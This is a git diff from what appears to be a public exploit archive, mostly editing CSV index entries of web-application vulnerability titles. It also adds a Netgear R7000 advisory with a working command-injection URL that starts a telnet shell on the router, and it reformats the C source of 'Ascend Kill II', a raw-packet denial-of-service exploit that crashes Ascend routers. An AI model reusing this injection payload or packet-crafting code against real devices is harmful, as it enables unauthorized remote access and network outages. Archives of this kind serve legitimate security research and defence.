+29089,platforms/asp/webapps/29089.txt,"Active News Manager - 'catID' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 +29090,platforms/asp/webapps/29090.txt,"Active News Manager - 'articleId' Parameter SQL Injection",2006-11-18,"laurent gaffie",asp,webapps,0 29091,platforms/php/webapps/29091.txt,"ZonPHP 2.25 - Remote Code Execution (Remote Code Execution)",2013-10-20,"Halim Cruzito",php,webapps,0 29156,platforms/asp/webapps/29156.txt,"CreaDirectory 1.2 - search.asp search Parameter Cross-Site Scripting",2006-11-21,"laurent gaffie",asp,webapps,0 29211,platforms/php/webapps/29211.txt,"WordPress Theme Curvo - Cross-Site Request Forgery / Arbitrary File Upload",2013-10-26,"Byakuya Kouta",php,webapps,0 @@ -30220,14 +30219,14 @@ id,file,description,date,author,platform,type,port 29136,platforms/asp/webapps/29136.txt,"Rapid Classified 3.1 - reply.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29137,platforms/asp/webapps/29137.txt,"Rapid Classified 3.1 - advsearch.asp Denial of Serviceearch Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29157,platforms/php/webapps/29157.txt,"Seditio 1.10 - Users.Profile.Inc.php SQL Injection",2006-11-21,"Mustafa Can Bjorn",php,webapps,0 -29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 - show_news.php Query String Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 -29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - rss.php rss_title Parameter Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 +29158,platforms/php/webapps/29158.txt,"CuteNews 1.4.5 - 'show_news.php' Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 +29159,platforms/php/webapps/29159.txt,"CuteNews 1.4.5 - 'rss_title' Parameter Cross-Site Scripting",2006-11-21,"Alireza Hassani",php,webapps,0 29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 - default.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - search_listing.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 -29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - Result Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 +29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - 'result' Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29219,platforms/asp/webapps/29219.txt,"DUdownload 1.0/1.1 - detail.asp Multiple Parameter SQL Injection",2006-12-02,"Aria-Security Team",asp,webapps,0 29220,platforms/asp/webapps/29220.html,"Metyus Okul Yonetim 1.0 - Sistemi Uye_giris_islem.asp SQL Injection",2006-12-04,ShaFuck31,asp,webapps,0 @@ -30640,7 +30639,7 @@ id,file,description,date,author,platform,type,port 29730,platforms/php/webapps/29730.txt,"SoftNews 4.1/5.5 - engine/init.php root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29731,platforms/php/webapps/29731.txt,"SoftNews 4.1/5.5 - engine/Ajax/editnews.php root_dir Parameter Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps,0 29733,platforms/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 -29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - ADODB-Connection.Inc.php Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 +29736,platforms/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps,0 29737,platforms/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - Check_Vote.php Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps,0 29742,platforms/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps,0 29744,platforms/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps,0 @@ -31413,8 +31412,8 @@ id,file,description,date,author,platform,type,port 31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0 31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 -31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - pref.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 -31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - search.php adv Parameter Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 +31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - 'pref.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 +31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - 'search.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0 31066,platforms/php/webapps/31066.txt,"Mambo Module MOStlyCE 2.4 - 'connector.php' Cross-Site Scripting",2008-01-28,AmnPardaz,php,webapps,0 31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0 @@ -31864,7 +31863,7 @@ id,file,description,date,author,platform,type,port 31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 - 'index.php' keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0 31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 - 'index.php' keyword Parameter Cross-Site Scripting",2008-05-02,"Ivan Sanchez",php,webapps,0 31727,platforms/php/webapps/31727.txt,"ChiCoMaS 2.0.4 - 'index.php' Cross-Site Scripting",2008-05-02,"Hadi Kiamarsi",php,webapps,0 -31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.0.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0 +31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.1.1 - 'upload.php' Arbitrary File Upload",2008-05-03,"Hadi Kiamarsi",php,webapps,0 31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL - PHP/prenom.php Multiple Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL - PHP/index.php nom_branche Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL - PHP/info.php Multiple Parameter Cross-Site Scripting",2008-05-05,ZoRLu,php,webapps,0 @@ -31998,7 +31997,6 @@ id,file,description,date,author,platform,type,port 31916,platforms/php/webapps/31916.txt,"Piwigo 2.6.1 - Cross-Site Request Forgery",2014-02-26,killall-9,php,webapps,80 31929,platforms/php/webapps/31929.txt,"SimpleNotes - Multiple Cross-Site Scripting Vulnerabilities",2008-06-16,sl4xUz,php,webapps,0 31933,platforms/php/webapps/31933.txt,"OpenDocMan 1.x - 'out.php' Cross-Site Scripting",2008-06-17,"Sergi Rosello",php,webapps,0 -31935,platforms/php/webapps/31935.txt,"Basic-CMS - 'index.php' SQL Injection",2008-06-17,Mr.SQL,php,webapps,0 31938,platforms/php/webapps/31938.txt,"KEIL Software PhotoKorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps,0 31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,AmnPardaz,php,webapps,0 @@ -32006,7 +32004,7 @@ id,file,description,date,author,platform,type,port 31944,platforms/php/webapps/31944.txt,"phpAuction - 'profile.php' SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 31945,platforms/php/webapps/31945.txt,"PEGames - Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 -31947,platforms/php/webapps/31947.txt,"Joomla! Component EXP Shop 1.0 'com_expshop' - SQL Injection",2008-06-22,His0k4,php,webapps,0 +31947,platforms/php/webapps/31947.txt,"Joomla! Component EXP Shop 1.0 - SQL Injection",2008-06-22,His0k4,php,webapps,0 31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 31949,platforms/php/webapps/31949.txt,"Chipmunk Blog - members.php membername Parameter Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 31950,platforms/php/webapps/31950.txt,"Chipmunk Blog - comments.php membername Parameter Cross-Site Scripting",2008-06-23,sl4xUz,php,webapps,0 @@ -32132,7 +32130,7 @@ id,file,description,date,author,platform,type,port 32118,platforms/php/webapps/32118.txt,"Greatclone GC Auction Platinum - 'category.php' SQL Injection",2008-07-27,"Hussin X",php,webapps,0 32119,platforms/asp/webapps/32119.txt,"Web Wiz Forum 9.5 - admin_group_details.asp mode Parameter Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0 32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - admin_category_details.asp mode Parameter Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0 -32121,platforms/php/webapps/32121.php,"Jamroom 3.3.8 - (Cookie Authentication Bypass and Unspecified Security Issues) Multiple Vulnerabilities",2008-07-28,"James Bercegay",php,webapps,0 +32121,platforms/php/webapps/32121.php,"Jamroom 3.3.8 - Cookie Authentication Bypass",2008-07-28,"James Bercegay",php,webapps,0 32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",php,webapps,0 32123,platforms/php/webapps/32123.txt,"MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusion",2008-07-29,"Ghost Hacker",php,webapps,0 32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,php,webapps,0 @@ -32752,7 +32750,7 @@ id,file,description,date,author,platform,type,port 33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter Cross-Site Scripting",2009-09-22,OoN_Boy,php,webapps,0 33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,php,webapps,0 33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0 -33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 - register.php result Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 +33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 33344,platforms/php/webapps/33344.txt,"CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)",2009-11-10,"Andrew Horton",php,webapps,0 33709,platforms/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting / SQL Injection",2010-03-05,"Maciej Gojny",php,webapps,0 33247,platforms/hardware/webapps/33247.txt,"OpenFiler 2.99.1 - Arbitrary Code Execution",2014-05-08,"Dolev Farhi",hardware,webapps,0 @@ -32795,7 +32793,7 @@ id,file,description,date,author,platform,type,port 33309,platforms/php/webapps/33309.txt,"TFTgallery 0.13 - 'album' Parameter Cross-Site Scripting",2009-10-26,blake,php,webapps,0 33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Parameter Cross-Site Scripting",2009-11-02,blake,php,webapps,0 33327,platforms/hardware/webapps/33327.txt,"Skybox Security 6.3.x < 6.4.x - Multiple Information Disclosure",2014-05-12,"Luigi Vezzoso",hardware,webapps,0 -33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - search.php from_date_day Parameter Full Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 +33341,platforms/php/webapps/33341.txt,"CuteNews 1.4.6 - 'from_date_day' Parameter Full Path Disclosure",2009-11-10,"Andrew Horton",php,webapps,0 33330,platforms/windows/webapps/33330.txt,"SpiceWorks 7.2.00174 - Persistent Cross-Site Scripting",2014-05-12,"Dolev Farhi",windows,webapps,80 33334,platforms/cgi/webapps/33334.txt,"VM Turbo Operations Manager 4.5x - Directory Traversal",2014-05-12,"Jamal Pecou",cgi,webapps,80 33353,platforms/hardware/webapps/33353.txt,"Broadcom PIPA C211 - Sensitive Information Disclosure",2014-05-14,Portcullis,hardware,webapps,80 @@ -32979,7 +32977,7 @@ id,file,description,date,author,platform,type,port 33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 - (surname parameter) Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 -33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id Parameter) SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 +33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - 'zero_view_article.php' SQL Injection",2014-06-10,LiquidWorm,php,webapps,80 33714,platforms/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Persistent Cross-Site Scripting",2014-06-11,rob222,php,webapps,0 33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS - 'pojam' Parameter Cross-Site Scripting",2010-03-05,hacker@sr.gov.yu,asp,webapps,0 33716,platforms/php/webapps/33716.txt,"Saskia's ShopSystem - 'id' Parameter Local File Inclusion",2010-03-05,cr4wl3r,php,webapps,0 @@ -33000,7 +32998,7 @@ id,file,description,date,author,platform,type,port 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE / Cross-Site Scripting Injection",2014-06-13,"BLacK ZeRo",aix,webapps,0 33760,platforms/multiple/webapps/33760.txt,"Multiple Products - 'banner.swf' Cross-Site Scripting",2010-03-15,MustLive,multiple,webapps,0 33761,platforms/asp/webapps/33761.txt,"Pars CMS - 'RP' Parameter Multiple SQL Injection",2010-03-15,Isfahan,asp,webapps,0 -33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 +33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - 'zero_transact_user.php' Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 33759,platforms/multiple/webapps/33759.txt,"DirectAdmin 1.33.6 - 'CMD_DB_VIEW' Cross-Site Scripting",2010-03-14,r0t,multiple,webapps,0 33748,platforms/php/webapps/33748.txt,"AneCMS 1.0 - 'index.php' Multiple HTML Injection Vulnerabilities",2010-03-11,"pratul agrawal",php,webapps,0 33749,platforms/php/webapps/33749.txt,"ARTIS ABTON CMS - Multiple SQL Injections",2010-03-11,MustLive,php,webapps,0 @@ -33059,7 +33057,7 @@ id,file,description,date,author,platform,type,port 33857,platforms/php/webapps/33857.txt,"e107 0.7.x - 'e107_admin/banner.php' SQL Injection",2010-04-21,"High-Tech Bridge SA",php,webapps,0 33997,platforms/php/webapps/33997.txt,"NPDS REvolution 10.02 - 'download.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 33998,platforms/php/webapps/33998.html,"Joomla! Component 'com_jcomments' 2.1 - 'ComntrNam' Parameter Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0 -33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - (zero_transact_article.php article_id POST Parameter) SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 +33846,platforms/php/webapps/33846.txt,"ZeroCMS 1.0 - 'zero_transact_article.php' SQL Injection",2014-06-23,"Filippos Mastrogiannis",php,webapps,0 33851,platforms/php/webapps/33851.txt,"Multiple WordPress Plugins (TimThumb 2.8.13 / WordThumb 1.07) - 'WebShot' Remote Code Execution",2014-06-24,@u0x,php,webapps,0 33854,platforms/php/webapps/33854.txt,"vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting",2010-04-20,"Edgard Chammas",php,webapps,0 33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 - 'ComeUrl' Parameter Cross-Site Scripting",2010-04-24,Liscker,php,webapps,0 @@ -34147,7 +34145,6 @@ id,file,description,date,author,platform,type,port 35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 35607,platforms/php/webapps/35607.txt,"WordPress Plugin Spellchecker 3.1 - 'general.php' Local File Inclusion / Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 35608,platforms/php/webapps/35608.txt,"WordPress Theme The Gazette Edition 2.9.4 - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 -35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (1)",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35611,platforms/php/webapps/35611.txt,"Website Baker 2.8.1 - Multiple SQL Injections",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35615,platforms/php/webapps/35615.txt,"PhpAlbum.net 0.4.1-14_fix06 - 'var3' Parameter Remote Command Execution",2011-04-14,"High-Tech Bridge SA",php,webapps,0 @@ -34330,7 +34327,6 @@ id,file,description,date,author,platform,type,port 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 35916,platforms/php/webapps/35916.txt,"WordPress Plugin Photo Gallery 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 -35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-07-04,"Stefan Schurtz",php,webapps,0 35922,platforms/php/webapps/35922.txt,"Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0 35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 @@ -36862,3 +36858,4 @@ id,file,description,date,author,platform,type,port 40856,platforms/hardware/webapps/40856.txt,"Xfinity Gateway - Remote Code Execution",2016-12-02,"Gregory Smiley",hardware,webapps,0 40877,platforms/php/webapps/40877.txt,"AbanteCart 1.2.7 - Cross-Site Scripting",2016-12-06,"Kacper Szurek",php,webapps,0 40887,platforms/hardware/webapps/40887.txt,"Cisco Unified Communications Manager 7/8/9 - Directory Traversal",2016-12-07,justpentest,hardware,webapps,0 +40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0 diff --git a/platforms/php/webapps/5850.txt b/platforms/asp/webapps/5850.txt similarity index 100% rename from platforms/php/webapps/5850.txt rename to platforms/asp/webapps/5850.txt diff --git a/platforms/php/webapps/5869.txt b/platforms/asp/webapps/5869.txt similarity index 100% rename from platforms/php/webapps/5869.txt rename to platforms/asp/webapps/5869.txt diff --git a/platforms/cgi/webapps/40889.txt b/platforms/cgi/webapps/40889.txt new file mode 100755 index 000000000..88cbaba3d --- /dev/null +++ b/platforms/cgi/webapps/40889.txt @@ -0,0 +1,14 @@ +# Exploit Title: Netgear R7000 - Command Injection +# Date: 6-12-2016 +# Exploit Author: Acew0rm +# Contact: https://twitter.com/Acew0rm1 +# Vendor Homepage: https://www.netgear.com/ +# Category: Hardware +# Version: V1.0.7.2_1.1.93 + +-Vulnerability +An unauthenticated user can inject commands threw +http://RouterIP/cgi-bin/;COMMAND. + +-Proof Of Concept +http://RouterIP/;telnetd$IFS-p$IFS'45' will open telnet on port 45. diff --git a/platforms/hardware/dos/20331.c b/platforms/hardware/dos/20331.c index b01a6431a..476686032 100755 --- a/platforms/hardware/dos/20331.c +++ b/platforms/hardware/dos/20331.c @@ -1,180 +1,182 @@ +/* source: http://www.securityfocus.com/bid/1855/info A vulnerability exists in the operating system of some Ascend routers. If an invalid TCP packet (of zero length) is sent to the administration port of Ascend Routers 4.5Ci12 or earlier, the result will be a crash and reboot of the attacked router, accomplishing a denial of service attack. Note that 3Com is reportedly also vulnerable, but it is not verified which versions of IOS are exploitable. +*/ - /* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug. - * see ftp.ascend.com. - */ - - /* - * Ascend Kill II - C version - * - * (C) 1998 Rootshell - http://www.rootshell.com/ - * - * Released: 3/16/98 - * - * Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues - * (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) - * - * Sends a specially constructed UDP packet on the discard port (9) - * which cause Ascend routers to reboot. (Warning! Ascend routers will - * process these if they are broadcast packets.) - * - * Compiled under RedHat 5.0 with glibc. - * - * NOTE: This program is NOT to be used for malicous purposes. This is - * intenteded for educational purposes only. By using this program - * you agree to use this for lawfull purposes ONLY. - * - * It is worth mentioning that Ascend has known about this bug for quite - * some time. - * - * Fix: - * - * Filter inbound UDP on port 9. - * - */ +/* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug. + * see ftp.ascend.com. + */ + +/* + * Ascend Kill II - C version + * + * (C) 1998 Rootshell - http://www.rootshell.com/ + * + * Released: 3/16/98 + * + * Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues + * (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html) + * + * Sends a specially constructed UDP packet on the discard port (9) + * which cause Ascend routers to reboot. (Warning! Ascend routers will + * process these if they are broadcast packets.) + * + * Compiled under RedHat 5.0 with glibc. + * + * NOTE: This program is NOT to be used for malicous purposes. This is + * intenteded for educational purposes only. By using this program + * you agree to use this for lawfull purposes ONLY. + * + * It is worth mentioning that Ascend has known about this bug for quite + * some time. + * + * Fix: + * + * Filter inbound UDP on port 9. + * + */ - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include - #define err(x) { fprintf(stderr, x); exit(1); } - #define errs(x, y) { fprintf(stderr, x, y); exit(1); } +#define err(x) { fprintf(stderr, x); exit(1); } +#define errs(x, y) { fprintf(stderr, x, y); exit(1); } - /* This magic packet was taken from the Java Configurator */ - char ascend_data[] = - { - 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, - 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, - 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, - 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, - 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, - 0x50, 0x41, 0x53, 0x53}; +/* This magic packet was taken from the Java Configurator */ +char ascend_data[] = + { + 0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00, + 0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, + 0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e, + 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53, + 0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44, + 0x50, 0x41, 0x53, 0x53}; - unsigned short - in_cksum (addr, len) - u_short *addr; - int len; - { - register int nleft = len; - register u_short *w = addr; - register int sum = 0; - u_short answer = 0; +unsigned short +in_cksum (addr, len) + u_short *addr; + int len; +{ + register int nleft = len; + register u_short *w = addr; + register int sum = 0; + u_short answer = 0; - while (nleft > 1) - { - sum += *w++; - nleft -= 2; - } - if (nleft == 1) - { - *(u_char *) (&answer) = *(u_char *) w; - sum += answer; - } + while (nleft > 1) + { + sum += *w++; + nleft -= 2; + } + if (nleft == 1) + { + *(u_char *) (&answer) = *(u_char *) w; + sum += answer; + } - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - answer = ~sum; - return (answer); - } + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + answer = ~sum; + return (answer); +} - int - sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) - struct sockaddr_in *sin; - unsigned short int s, datalen, sport, dport; - unsigned long int saddr, daddr; - char *data; - { - struct iphdr ip; - struct udphdr udp; - static char packet[8192]; - char crashme[500]; - int i; +int +sendpkt_udp (sin, s, data, datalen, saddr, daddr, sport, dport) + struct sockaddr_in *sin; + unsigned short int s, datalen, sport, dport; + unsigned long int saddr, daddr; + char *data; +{ + struct iphdr ip; + struct udphdr udp; + static char packet[8192]; + char crashme[500]; + int i; - ip.ihl = 5; - ip.version = 4; - ip.tos = rand () % 100;; - ip.tot_len = htons (28 + datalen); - ip.id = htons (31337 + (rand () % 100)); - ip.frag_off = 0; - ip.ttl = 255; - ip.protocol = IPPROTO_UDP; - ip.check = 0; - ip.saddr = saddr; - ip.daddr = daddr; - ip.check = in_cksum ((char *) &ip, sizeof (ip)); - udp.source = htons (sport); - udp.dest = htons (dport); - udp.len = htons (8 + datalen); - udp.check = (short) 0; - memcpy (packet, (char *) &ip, sizeof (ip)); - memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); - memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); - /* Append random garbage to the packet, without this the router - will think this is a valid probe packet and reply. */ - for (i = 0; i < 500; i++) - crashme[i] = rand () % 255; - memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500); - return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, - (struct sockaddr *) sin, sizeof (struct sockaddr_in))); - } + ip.ihl = 5; + ip.version = 4; + ip.tos = rand () % 100;; + ip.tot_len = htons (28 + datalen); + ip.id = htons (31337 + (rand () % 100)); + ip.frag_off = 0; + ip.ttl = 255; + ip.protocol = IPPROTO_UDP; + ip.check = 0; + ip.saddr = saddr; + ip.daddr = daddr; + ip.check = in_cksum ((char *) &ip, sizeof (ip)); + udp.source = htons (sport); + udp.dest = htons (dport); + udp.len = htons (8 + datalen); + udp.check = (short) 0; + memcpy (packet, (char *) &ip, sizeof (ip)); + memcpy (packet + sizeof (ip), (char *) &udp, sizeof (udp)); + memcpy (packet + sizeof (ip) + sizeof (udp), (char *) data, datalen); + /* Append random garbage to the packet, without this the router + will think this is a valid probe packet and reply. */ + for (i = 0; i < 500; i++) + crashme[i] = rand () % 255; + memcpy (packet + sizeof (ip) + sizeof (udp) + datalen, crashme, 500); + return (sendto (s, packet, sizeof (ip) + sizeof (udp) + datalen + 500, 0, + (struct sockaddr *) sin, sizeof (struct sockaddr_in))); +} - unsigned int - lookup (host) - char *host; - { - unsigned int addr; - struct hostent *he; +unsigned int +lookup (host) + char *host; +{ + unsigned int addr; + struct hostent *he; - addr = inet_addr (host); - if (addr == -1) - { - he = gethostbyname (host); - if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL)) - return 0; + addr = inet_addr (host); + if (addr == -1) + { + he = gethostbyname (host); + if ((he == NULL) || (he->h_name == NULL) || 